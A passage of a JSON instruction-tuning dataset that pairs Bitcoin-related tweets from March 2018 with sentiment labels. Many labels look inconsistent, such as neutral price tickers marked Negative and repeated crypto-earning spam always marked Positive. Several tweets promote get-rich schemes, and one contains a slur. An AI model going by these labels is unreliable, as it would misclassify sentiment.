$Bitcoin is a bubble of noobs.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.71%, ($-5768) [Currently $8402.005] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay The Champcoin is next Bitcoin.Tcc is Frist cryptocurrency in India.I love Tcc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8410 / \u20ac6820 / \u00a35960 @ Block 514766. \nMarket Cap: 143.29B USD. #Bitcoin #Finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ICX listing on #bithumb is today and not the 25th. Hope there will be some good price action! \u2022\n\u2022\n#icon #btc #bitcoin #cryptocurrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benchten Are \u201cbillioins\u201d some new type of bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "really want to donate to sci-hub for its priceless service rendered to all broke students but why do u only accept bitcoin, sci-hub.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "425 #Bitcoin mined since last tweet.\n \n It represents $3,587,425 (At $8,441 per $BTC #BTC) \n New Supply: 16,934,575 \n Progress: 80.64 %", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@infowars It\u2019s time to fight the banks use bitcoin to buy your guns! #bitcoinnews #2A #cryptocurrencies", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Got left holding a bag while I was sleeping. 
#crypto #cryptocurrencies #btc #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN futures: 8,390 (-210)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cyrii_Lightning 100 percent....it's a pile of dogshit to hold while bitcoin is falling", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who else is \"Doubling Down\" on Bitcoin? \nPeter Thiel\nRainer-Marc Frey\n....", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "There is only one Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@8bitandstuff We have to dump nobbs in $bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JoelOsteen Heaven Helps Those who Help Themselves. Get Started with Bitcoin trade and Earn over $12,000 Weekly. Follow the Right Part.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph This debate about what coins are, including Bitcoin, is really stupid.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Egon_01 @Nicknameul @el33th4xor on the bitcoin network? \ud83d\ude26why not bitcoin cash? blocks too big?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-SIB AskRate: 0.00014245 #Bittrex #SIB $SIB #Siberian Chervonets #altcoin #bitcoin #cryptocurrencies\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8429.78 / 6834.283\u20ac\n1 bitcoin-cash = $966.927 / 783.917\u20ac\n1 ethereum = $517.549 / 419.593\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@HoldenCrypfield Bitcoin isn't a company.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8396.97", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nakamotech fan: h\nwinwin: i accept credit debit bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin drops over 4% after Japan warns largest operator #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee so when is your $1M bitcoin price call gona happen?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SiLoMixMaster @BigCheds Icon is gaining while Bitcoin is dropping arm \ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "aEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Blocked by @wmiddelkoop because of #Bitcoin and #Crypto -- Bullish!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Litecoin bitcoin safest but plenty others quite safe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Whale is bitcoin and litecoin \u26a1\ufe0fatomic swap \ud83d\udd1cThere wasn\u2019t no update on the last show.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin, obvs..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@contestpal How many RS. in a Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Is Bitcoin Cash [BTG] dying a slow death @360_trader? #BTC #bitcoin #TA", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "23% of Lost Bitcoin May Never Be Recovered~ TimeBox will fix the problem in future!\n\n#BTC #ETH #Timebox", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27791.66 | LITECOIN(MCDTBC) R$573.33000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Nigga had 40 bitcoin on a flash drive", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eco is a pretty awesome concept..if it succeeds, I see myself using it\n\n#eco #bitcoin #crypto #blockchain", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8383.1 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,415.39, market cap of $142,511,053,109 (44.31%), and 24 hr vol. 
of $5,562,470,000 (37.71%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 23, 2018 12:00AM #Bitcoin Price:\nUSD 8634.59 | EUR 7012.58 | JPY 914988.62", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,382.36, EUR 6,803.94", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,422.22\nChange in 1h: -0.32%\nMarket cap: $142,626,716,256.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8415.39\nEthereum:$517.299\nBitcoin Cash:$969.716\nLitecoin:$158.245\nRipple:$0.634575\nIOTA:$1.26241", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8415.39 / 6822.617\u20ac\n1 bitcoin-cash = $967.81 / 784.633\u20ac\n1 ethereum = $517.35 / 419.431\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 07:00 UTC Bitcoin Price: 8383.70 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Buy? Sell? Or wait? Daily Forecasts for EURUSD, GBPUSD, USDJPY, Bitcoin, etc. on Daily, Weekly and Monthly charts. 
#ForexTips", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8375.55/$8383.69 #Bitstamp\n$8368.09/$8373.98 #Kraken\n\u21e2$-15.60/$-1.57\n$8321.19/$8404.84 #Coinbase\n\u21e2$-62.50/$29.29", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$25.0M; Support til $8100:$50.4M $BTC $BTCUSD #bitcoin #orderbook #crypto #markets", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003298 (-0.00000008) #BTC / 0.276503 (-0.00132) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002259 (+0.00000004) #BTC / 0.189401 (-0.00015) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474978 (-0.00038850) #BTC / 398.212 (-4.25500) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004444 (-0.00000092) #BTC / 0.372594 (-0.00866) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077674 (-0.00000378) #BTC / 6.51204 (-0.04799) #USD. Market rank is 7. 
#eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8394.84 | -0.0018%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#xatracoin is wonderful project. Don't miss it! #XTR #ICO #XATRA #Blockchain #Coin #BTC #bitcoin #ETH #Ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,381.78 v #BitcoinCash $965.99 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 16:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Change publishing forever Accept #bitcoin payments ask thehumanfaucet to get started #askastoreaday", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via @Chain #bitcoin #finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current #Bitcoin price: $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I earn R36000 a month \nInbox for a relationship. \n#TrapaDrive \n#SaWasABetterPlaceBefore \n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ToysRus Everyday you miss not accepting #bitcoin ,is money lost, can you afford another year like this? thehumanfaucet will get you started", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8376.47 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars #cryptonews #crypto #altcoins", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", 
"output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #Bitcoin #Finance #Entrepreneur", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 $BTC You down?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#FYI Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cryptobot reporting that 1 Bitcoin is now 8376.47 USD! #bitcoin #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!\n[Virtual currency mining Encryption currency]", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK! 
!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via @BTCpx #BTC $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin $btc is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8376.47 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RampCapitalLLC if #Bitcoin isn\u2019t $10Trillion by next week, I will eat my breakfast live on Facebook.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8718.74 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alextohme Well @jack thinks the whole world will be on some form of global bitcoin in 10years - so all the $$ mean nothing \ud83d\ude02\ud83d\ude02", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the 
tweet.", "input": "Good morning! The current price of Bitcoin is $8376.47.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Malowbar Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin What? Lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token #ROX #Robotinaico", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $9026.40 @Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8610.90 @Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "DataBroker DAO is the first marketplace to trade sensor data \n#internetofthings #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ElongWilliam @barichnel We have many children of bitcoin like litecoin, coinbase.\nPm me for more information about it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8376.47 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@realDonaldTrump It's time to buy Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ZECUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sets your bar high, even if you fail. #Crypto #Bitcoin #Ethereum #Neo #ETN #Litecoin #JACKMATE", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee Your ding dong is safe. 
#Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTCUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8415.39 Down -$21.75 -0.26% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCountant Come on Bitcoin do your thing so i can buy some cheap WAN", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.422,220\n1 Hour: -0.32 % | 24 Hours: -6.66 % | 7 Days: 2.84 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8449.41 / 6850.198\u20ac\n1 bitcoin-cash = $970.175 / 786.55\u20ac\n1 ethereum = $517.205 / 419.314\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #bitcoinworld", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Kept my head down for couple weeks. Whats the news in crypto.........same as everyday, sweet. 
#crypto #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.58%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8427.19", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83c\udf08 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.37B USD\n#bitcoin #cryptopaymon \ud83e\udd16", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@enekoknorr Fortunately (for them) most of it on Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9428.13 --- Includes Sum of Forks, Core $8406.00 (89.16%) + Cash $964.97 (10.23%) + Gold $57.16 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheCryptoDog Never heard of them. Is that like the bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8449.41.\nThe current price of BCash is $970.175, or 0.115625 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Use your browser to passively mine bitcoin and receive mining rewards instantly to your account, credited every hour.start is\u2192http://freebit", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$973,353\n1 Hour: 0.04 % | 24 Hours: -7.08 % | 7 Days: 5.85 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 08:17:22 2018 (69:54)\nUSD : 8416.92\nWght: 0.42\nBlk#: 514767\nSize: 1050.1 KB\nTXs: 2151\nPool: 6729 (4.3 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC is Next Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee JAPAN FUD = BITCOIN CRASH. Every FUD = crash. Bubble has burst.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000046e410eb1454e5ba5c83eb5df6253414a3127e02e3ed9a mined at height 514767.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "NEO is now \u00a345.88. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.96 / 6843.347\u20ac\n1 bitcoin-cash = $973.353 / 789.127\u20ac\n1 ethereum = $517.037 / 419.177\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ssohanurrahman2 what price did you first get into Bitcoin at?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Pls I wanna go into bitcoin business. Anyone with advice please help I don't wanna lose my cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the comunnity #bitcoin #cryptocurrency #alts #ALTSEASON #Blockchain #Forum #Airdrops #BountyProgram", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RealJamesWoods @dtannie Forgot to say, thanks, Woods. 
#bitcoin BoycottCosco", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 08:25:11 2018 (7:49)\nUSD : 8398.21\nWght: 0.42\nBlk#: 514768\nSize: 1125.3 KB\nTXs: 2223\nPool: 5350 (3.7 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000303b4f6effdf147d5954ca6a640d7b78bf09a99b57f36b mined at height 514768.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Doesn\u2018t look very centralized to me, tbh", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.24%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dark_Realist @LuminousNebulae @hellosugoi @bitcoinmom @La__Cuen I love, love, love my Bitcoin family. \u2698\u2698\u2698", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitfinexed Even DMM in Japan is dealing with Bitcoin now, why gave the profits and advantages to the shity Chinese Tether exchange?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-SEQ AskRate: 0.00002180 #Bittrex #SEQ $SEQ #Sequence #altcoin #altcoins #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8437.33\nEthereum:$515.595\nBitcoin Cash:$971.782\nLitecoin:$158.2\nRipple:$0.632992\nIOTA:$1.25814", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8437.33 / 6840.404\u20ac\n1 bitcoin-cash = $969.847 / 786.285\u20ac\n1 ethereum = $514.437 / 417.07\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8407.38@bitstamp. High $9025.000. Low $8342.000. Market Cap $142.372 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003286 (-0.00000012) #BTC / 0.27662 (+0.00012) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004490 (+0.00000046) #BTC / 0.377967 (+0.00537) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002263 